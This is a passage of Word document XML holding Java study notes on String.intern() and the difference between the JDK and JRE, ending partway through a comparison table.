    <w:p w14:paraId="6F2AC065" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5623E2E5" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ithout intern(), str1 and str2 are two distinct objects in memory, even though they have the same content ("Hello").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C43CF0" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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fter calling intern() on both str1 and str2, both str3 and str4 point to the same string in the string pool, which is why str3 == str4 returns true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3862A38C" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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Benefits of intern():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B28FBF7" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55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Optimization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you have many strings with the same content (e.g., user input or dynamically generated strings), calling intern() ensures that only one instance of each unique string is stored in memory, saving space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E56FEDC" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55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ring Comparisons</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since strings in the string pool are guaranteed to be unique by reference, you can use == to compare string references instead of equals() to check if two strings are the same, which can be faster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7C0660" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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otential Drawbacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630D8383" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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erformance Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Interning strings may have a small performance overhead because Java needs to search the string pool to check for existing strings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187B3559" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Consumption</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: While interning can save memory for repeated strings, if overused, it can increase memory consumption by filling up the string pool with too many distinct strings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BA5B5E" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9" w:rsidP="0028064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0D4FFC4B" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9" w:rsidP="0028064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intern() method is useful for optimizing memory usage when you have many duplicate strings in your application. By ensuring that identical strings share the same reference in the string pool, you can reduce memory overhead and speed up string comparison using ==. However, it should be used carefully, as excessive interning might cause the string pool to grow larger than necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276E17A3" w14:textId="62E2A389" w:rsidR="00342FA5" w:rsidRPr="00CE4B9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58D9039">
          <v:rect id="_x0000_i1237" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3438A9FC" w14:textId="77777777" w:rsidR="005B2F6C" w:rsidRPr="00CE4B95" w:rsidRDefault="005B2F6C" w:rsidP="005B2F6C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02172070" w14:textId="77777777" w:rsidR="00322B4D" w:rsidRPr="00CE4B95" w:rsidRDefault="00322B4D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="051DEAC6" w14:textId="443D81C1" w:rsidR="00322B4D" w:rsidRPr="00CE4B95" w:rsidRDefault="00322B4D" w:rsidP="00322B4D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc196307571"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Java Memory Management</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w14:paraId="6792C464" w14:textId="77777777" w:rsidR="006A20C6" w:rsidRPr="00CE4B95" w:rsidRDefault="006A20C6" w:rsidP="00322B4D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55CB50A0" w14:textId="77777777" w:rsidR="00272D63" w:rsidRPr="00CE4B95" w:rsidRDefault="00272D63">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc196307572"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain JDK, JRE?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w14:paraId="1FE78364" w14:textId="41AC11D9" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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JDK vs JRE – Explained Simply</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA85964" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B203C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ACCF6E5">
          <v:rect id="_x0000_i1238" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4879FE6F" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203C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JDK (Java Development Kit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B22CF81" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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hat is it?</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">JDK is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>complete software development kit</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>develop Java applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517F3FE9" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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hat does it include?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C3A264" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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RE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Java Runtime Environment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01399A84" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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iler (javac)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – to compile .java files into .class files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E978AC" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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bugger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC7133D" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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ools</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for monitoring and developing Java applications (like javadoc, javap, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C39C557" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Needed by </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>developers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to write, compile, and run Java programs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F54894F" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ase:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">When you're developing Java applications, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>install the JDK</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6924971B" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B203C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42896AB">
          <v:rect id="_x0000_i1239" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC5C6F1" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203C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JRE (Java Runtime Environment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6DE71D" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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hat is it?</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">JRE provides the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>minimum environment to run Java applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C481C06" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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hat does it include?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2567FFE0" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Java Virtual Machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D00B38" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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re Java libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like java.lang, java.util)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454B2AD3" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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pporting files and class loaders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB6C56E" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Needed by </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>users</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production environments</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java applications (not develop).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C0F290" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ase:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">If you're only running Java applications (not writing code), </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>install only JRE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722663D6" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B203C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428F20B">
          <v:rect id="_x0000_i1240" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D10DAA" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203C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Difference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8"/>
        <w:gridCol w:w="2270"/>
        <w:gridCol w:w="2471"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B203CA" w:rsidRPr="00CE4B95" w14:paraId="2A03A894" w14:textId="77777777" w:rsidTr="00726D2F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00061598" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203C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04770BBD" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203C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JDK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="660A08E2" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203C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JRE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B203CA" w:rsidRPr="00CE4B95" w14:paraId="0C59BAAE" w14:textId="77777777" w:rsidTr="00726D2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6966FB4C" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203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ll form</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EC38207" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203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 Development Kit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D602435" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203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 Runtime Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B203CA" w:rsidRPr="00CE4B95" w14:paraId="781D3C1B" w14:textId="77777777" w:rsidTr="00726D2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="695B6C3E" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203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tains</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="735467DA" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203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RE + Development tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
